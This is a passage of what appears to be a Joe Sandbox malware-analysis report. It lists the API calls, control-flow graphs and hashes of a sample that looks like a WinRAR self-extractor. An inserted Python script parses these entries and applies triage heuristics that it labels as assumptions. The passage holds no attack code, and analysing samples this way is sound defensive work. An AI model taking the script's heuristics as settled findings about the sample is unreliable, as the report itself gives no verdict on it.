                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00D7FA38
                                                                                      • CloseHandle.KERNELBASE(?), ref: 00D7FA44
                                                                                      • CloseHandle.KERNEL32(?), ref: 00D7FA50
                                                                                        • Part of subcall function 00D7FAC7: WaitForSingleObject.KERNEL32(?,000000FF,00D7FD0B,?,?,00D7FD80,?,?,?,?,?,00D7FD6A), ref: 00D7FACD
                                                                                        • Part of subcall function 00D7FAC7: GetLastError.KERNEL32(?,?,00D7FD80,?,?,?,?,?,00D7FD6A), ref: 00D7FAD9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 1868215902-0
                                                                                      • Opcode ID: 0cbfa0c043a91d607cc33c11ca46dd26440c869c14d8a035dac7912c2822a001
                                                                                      • Instruction ID: 7071da7ed9a07620c3945c89a9e65343ecd4cdbbc5cdf00c7ce53712729a2e80
                                                                                      • Opcode Fuzzy Hash: 0cbfa0c043a91d607cc33c11ca46dd26440c869c14d8a035dac7912c2822a001
                                                                                      • Instruction Fuzzy Hash: 1B014C32440744EFCB319B68DD85B86BBAAFB46710F00852AF29E92664DB716804CB71

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 896 d88fc8-d88fe7 GetClassNameW 897 d88fe9-d88ffe call d80b12 896->897 898 d8900f-d89011 896->898 903 d8900e 897->903 904 d89000-d8900c FindWindowExW 897->904 899 d8901c-d89020 898->899 900 d89013-d89016 SHAutoComplete 898->900 900->899 903->898 904->903
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000050), ref: 00D88FDF
                                                                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D89016
                                                                                        • Part of subcall function 00D80B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00D7AC49,?,?,?,00D7ABF8,?,-00000002,?,00000000,?), ref: 00D80B28
                                                                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D89006
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                      • String ID: EDIT
                                                                                      • API String ID: 4243998846-3080729518
                                                                                      • Opcode ID: ae366f1d7ee2739f584c256e53f7e59c1a7cf5e270ec2c51d779bcd8391ba861
                                                                                      • Instruction ID: 1aa7889bad02b8a1494d41aa4616a91e8d984bc91a6f981de96db47587009cfc
                                                                                      • Opcode Fuzzy Hash: ae366f1d7ee2739f584c256e53f7e59c1a7cf5e270ec2c51d779bcd8391ba861
                                                                                      • Instruction Fuzzy Hash: C9F0893260132867EB306A655C05FAB77AC9B46B11F080165B940F2281D7609D01C7F6

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 905 d8be0a-d8be35 call d8cec0 SetEnvironmentVariableW call d7ef07 909 d8be3a-d8be3e 905->909 910 d8be40-d8be44 909->910 911 d8be62-d8be66 909->911 912 d8be4d-d8be54 call d7effe 910->912 915 d8be46-d8be4c 912->915 916 d8be56-d8be5c SetEnvironmentVariableW 912->916 915->912 916->911
                                                                                      APIs
                                                                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D8BE20
                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D8BE5C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentVariable
                                                                                      • String ID: sfxcmd$sfxpar
                                                                                      • API String ID: 1431749950-3493335439
                                                                                      • Opcode ID: 37cd7dd425e9048af42d46ce79df732f84012b30632438a1b58c37f80dfadd13
                                                                                      • Instruction ID: c3dc8b21663de4c5e4ae0631348c4fbd5d0ea54401663df8e857dd40c4930c43
                                                                                      • Opcode Fuzzy Hash: 37cd7dd425e9048af42d46ce79df732f84012b30632438a1b58c37f80dfadd13
                                                                                      • Instruction Fuzzy Hash: 19F0A072811324AEC7223F949C09EFABB98EF09B61F044092FD88D6241E7649C80C7B0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 917 d7973d-d7975e call d8cec0 920 d79767 917->920 921 d79760-d79765 917->921 922 d79769-d79786 920->922 921->920 921->922 923 d7978e-d79798 922->923 924 d79788 922->924 925 d7979d-d797c8 CreateFileW 923->925 926 d7979a 923->926 924->923 927 d7982c-d79841 925->927 928 d797ca-d797ec GetLastError call d7b275 925->928 926->925 929 d79843-d79856 call d7f10e 927->929 930 d7985b-d79866 927->930 934 d797ee-d79810 CreateFileW GetLastError 928->934 935 d7981b-d79820 928->935 929->930 936 d79816-d79819 934->936 937 d79812 934->937 935->927 938 d79822 935->938 936->927 936->935 937->936 938->927
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,00D7777A,?,00000005,?,00000011), ref: 00D797BD
                                                                                      • GetLastError.KERNEL32(?,?,00D7777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D797CA
                                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00D7777A,?,00000005,?), ref: 00D797FF
                                                                                      • GetLastError.KERNEL32(?,?,00D7777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D79807
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 1214770103-0
                                                                                      • Opcode ID: 1e6e6e34ec2d41804cf43bcd13db3a07f87d39b456918bc08f56da3a665d0cc2
                                                                                      • Instruction ID: cba1aa0ba2f41c3d879239d21ce6c7be83aed47f751527bae9cc25b21adce7df
                                                                                      • Opcode Fuzzy Hash: 1e6e6e34ec2d41804cf43bcd13db3a07f87d39b456918bc08f56da3a665d0cc2
                                                                                      • Instruction Fuzzy Hash: 223154728403556FE3209F248C05BE6BBA4FB46320F048629F994872D1E3759888CBB1
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00D79623
                                                                                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00D7963B
                                                                                      • GetLastError.KERNEL32 ref: 00D7966D
                                                                                      • GetLastError.KERNEL32 ref: 00D7968C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FileHandleRead
                                                                                      • String ID:
                                                                                      • API String ID: 2244327787-0
                                                                                      • Opcode ID: 35fca890dfba21cb3d557a57dcf88439e69d488e8b971d861d98d27f3469628d
                                                                                      • Instruction ID: dbca83e271dca2f189283d78c068d0c54742d50495cebcb8cdde9a2d5dd7f43a
                                                                                      • Opcode Fuzzy Hash: 35fca890dfba21cb3d557a57dcf88439e69d488e8b971d861d98d27f3469628d
                                                                                      • Instruction Fuzzy Hash: 4D115A32500204ABCF205F61C824A6EBBA9EB06331F14C62AF9AEC5290E736CD409F75
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D92213,00000000,00000000,?,00D97778,00D92213,00000000,00000000,00000000,?,00D97975,00000006,FlsSetValue), ref: 00D97803
                                                                                      • GetLastError.KERNEL32(?,00D97778,00D92213,00000000,00000000,00000000,?,00D97975,00000006,FlsSetValue,00DA3768,00DA3770,00000000,00000364,?,00D963F1), ref: 00D9780F
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D97778,00D92213,00000000,00000000,00000000,?,00D97975,00000006,FlsSetValue,00DA3768,00DA3770,00000000), ref: 00D9781D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 3177248105-0
                                                                                      • Opcode ID: e4a000f299db7e9fc0f33b2eb0db56069837b4ca8a27459b30cade61d3011288
                                                                                      • Instruction ID: 3d50209b84c3d5cfd667b6b87099f756cacff86d20f46a871651365fc2429521
                                                                                      • Opcode Fuzzy Hash: e4a000f299db7e9fc0f33b2eb0db56069837b4ca8a27459b30cade61d3011288
                                                                                      • Instruction Fuzzy Hash: 0D01A7367293239BCB614B799C48E6A7B98EF457B1B140620FA46D7340D720D901C6F0
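Triage tooling for entries like the ones above, as an added example that is not Joe Sandbox code and not part of the analysed sample: it parses the `• API.MODULE(args), ref: ADDR` bullet format of the APIs lists into records and runs a few hand-written heuristics over them. The SAMPLE lines are copied from this page; the heuristics are this example's own assumptions (the `sfxcmd`/`sfxpar` pair is the environment-variable convention of WinRAR's SFX module, and 0x800 is the documented `LOAD_LIBRARY_SEARCH_SYSTEM32` flag of `LoadLibraryExW`).

```python
"""Parse Joe Sandbox 'APIs' bullets into records and apply triage heuristics.

Added example: not Joe Sandbox code and not part of the sample. SAMPLE is
copied from the report; the rules in triage() are this example's assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"          # the argument list is optional
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_TOKEN = re.compile(r"^-?[0-9A-Fa-f]{8}$")

LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x800    # documented LoadLibraryExW flag
SFX_ENV_VARS = {"sfxcmd", "sfxpar"}      # WinRAR SFX convention (assumption: a marker, not proof)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                              # call-site address from the 'ref:' field
    args: List[str] = field(default_factory=list)
    subcall_of: Optional[int] = None      # set for 'Part of subcall function X:' lines


def as_int(tok: str) -> Optional[int]:
    """8-digit hex tokens (the report prints negatives as -00000002) become ints;
    '?' and string arguments such as FlsSetValue yield None."""
    return int(tok, 16) if HEX_TOKEN.match(tok) else None


def parse(lines) -> List[ApiCall]:
    """Keep only lines in the APIs bullet format; headings and hashes are skipped."""
    calls = []
    for line in lines:
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(
            api=m["api"], module=m["module"], ref=int(m["ref"], 16), args=args,
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def triage(calls: List[ApiCall]) -> List[str]:
    """First-pass heuristics; call order is kept so the loader fallback can be tied together."""
    findings = []
    seen_system32_load = False
    for c in calls:
        if c.api == "SetEnvironmentVariableW" and c.args and c.args[0] in SFX_ENV_VARS:
            findings.append(f"{c.ref:08X}: sets {c.args[0]} (WinRAR SFX stub convention)")
        elif c.api == "LoadLibraryExW" and len(c.args) >= 3:
            flags = as_int(c.args[2])
            if flags is not None and flags & LOAD_LIBRARY_SEARCH_SYSTEM32:
                seen_system32_load = True
                findings.append(f"{c.ref:08X}: LoadLibraryExW restricted to System32")
            elif flags == 0:
                note = " (fallback after a System32-restricted attempt)" if seen_system32_load else ""
                findings.append(f"{c.ref:08X}: LoadLibraryExW with default search order{note}")
        elif c.api == "CreateThread" and len(c.args) >= 3:
            findings.append(f"{c.ref:08X}: new thread at {c.args[2]}, stack size {c.args[1]}")
    return findings


# Copied from the APIs lists of this report.
SAMPLE = """\
• SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D8BE20
• SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D8BE5C
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D92213,00000000,00000000,?,00D97778,00D92213,00000000,00000000,00000000,?,00D97975,00000006,FlsSetValue), ref: 00D97803
• GetLastError.KERNEL32(?,00D97778,00D92213,00000000,00000000,00000000,?,00D97975,00000006,FlsSetValue,00DA3768,00DA3770,00000000,00000364,?,00D963F1), ref: 00D9780F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D97778,00D92213,00000000,00000000,00000000,?,00D97975,00000006,FlsSetValue,00DA3768,00DA3770,00000000), ref: 00D9781D
• GetLastError.KERNEL32 ref: 00D7966D
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D977A2
  • Part of subcall function 00D981EB: GetOEMCP.KERNEL32(00000000,?,?,00D98474,?), ref: 00D98216
• CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 00D7FBD5
"""

if __name__ == "__main__":
    for finding in triage(parse(SAMPLE.splitlines())):
        print(finding)
```

Run it directly to print the findings for SAMPLE, or feed it the APIs bullets of any other entry on this page. Keeping the calls in report order matters for the loader rule: the 0x800 call at 00D97803 followed by the flags-0 call at 00D9781D is consistent with a runtime that tries a System32-only load first and falls back to the default search order, which reads differently from a bare `LoadLibraryExW(..., 0)` with no preceding restricted attempt.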
                                                                                      APIs
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D8992F
                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D89940
                                                                                      • TranslateMessage.USER32(?), ref: 00D8994A
                                                                                      • DispatchMessageW.USER32(?), ref: 00D89954
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4217535847-0
                                                                                      • Opcode ID: a4f55f65a15f849aa913c5103be7f9bcc76855dbba937c445044af8db658f8ab
                                                                                      • Instruction ID: 17e92c83001e5ae3a3f3e4bf556d7b1662ff6e8e5463005047ab91b020377dbc
                                                                                      • Opcode Fuzzy Hash: a4f55f65a15f849aa913c5103be7f9bcc76855dbba937c445044af8db658f8ab
                                                                                      • Instruction Fuzzy Hash: 63E0ED72C0222EA78B20ABEAAC4CCEFBFACEE072657004115B519D2100D7789505CBF1
                                                                                      APIs
                                                                                        • Part of subcall function 00D981EB: GetOEMCP.KERNEL32(00000000,?,?,00D98474,?), ref: 00D98216
                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D984B9,?,00000000), ref: 00D9868C
                                                                                      • GetCPInfo.KERNEL32(00000000,00D984B9,?,?,?,00D984B9,?,00000000), ref: 00D9869F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CodeInfoPageValid
                                                                                      • String ID: d0F
                                                                                      • API String ID: 546120528-1238022483
                                                                                      • Opcode ID: b1c73db3a20c6df08befe536d678216721c4a5f96e70eee1f09d737ebc6b2344
                                                                                      • Instruction ID: bcaa786f391418155c59dabe32bfa53a5ddd9bf12b027fba37dadec099fd576b
                                                                                      • Opcode Fuzzy Hash: b1c73db3a20c6df08befe536d678216721c4a5f96e70eee1f09d737ebc6b2344
                                                                                      • Instruction Fuzzy Hash: A9512570A003459EDF219FB5C881ABABBE5EF43B10F28446ED0968B251DF35D945EBB0
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D982E8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID: $d0F
                                                                                      • API String ID: 1807457897-1605285952
                                                                                      • Opcode ID: ef5f39786f8deb961ad7e7dc66bdb75cd774c351546bddd6b7bc21d7695d398f
                                                                                      • Instruction ID: 763400407378265f076f896a83138b0e14933f17244e7ec00ec2438fc76f315f
                                                                                      • Opcode Fuzzy Hash: ef5f39786f8deb961ad7e7dc66bdb75cd774c351546bddd6b7bc21d7695d398f
                                                                                      • Instruction Fuzzy Hash: 6F411A7050434C9ADF218E28CC84AFABBEADF46B04F5804EDE5CAC6142D6359945EF70
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00D97795
                                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D977A2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                                                      • String ID: d0F
                                                                                      • API String ID: 2279764990-1238022483
                                                                                      • Opcode ID: 1a1e5a597941b5461340148e4e05d1a69e3519b1cf8116c40bc345611f8d33d8
                                                                                      • Instruction ID: cf7d9a78579d90934724dc860d04cd61708553761bf61161398df34dcf88e368
                                                                                      • Opcode Fuzzy Hash: 1a1e5a597941b5461340148e4e05d1a69e3519b1cf8116c40bc345611f8d33d8
                                                                                      • Instruction Fuzzy Hash: 5011A337A14321AB9F259FACEC819AA7395EB85720B1A0220ED15EB354D731DC4187F1
                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 00D7FBD5
                                                                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 00D7FC1C
                                                                                        • Part of subcall function 00D76DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D76DF1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                      • String ID: CreateThread failed
                                                                                      • API String ID: 2655393344-3849766595
                                                                                      • Opcode ID: fc9e5c47fe559388a17c8701b488201326e296bd2cc527184406d6eac3279f7c
                                                                                      • Instruction ID: 928fff6175c028c0a4ecc434f2df5f02d57b8c6d7254cf8f2567807afcd950e1
                                                                                      • Opcode Fuzzy Hash: fc9e5c47fe559388a17c8701b488201326e296bd2cc527184406d6eac3279f7c
                                                                                      • Instruction Fuzzy Hash: 3C01D6713443096FD2306F58DC82F667799EB46721F10443EF946D2280EAE2A8458631
                                                                                      APIs
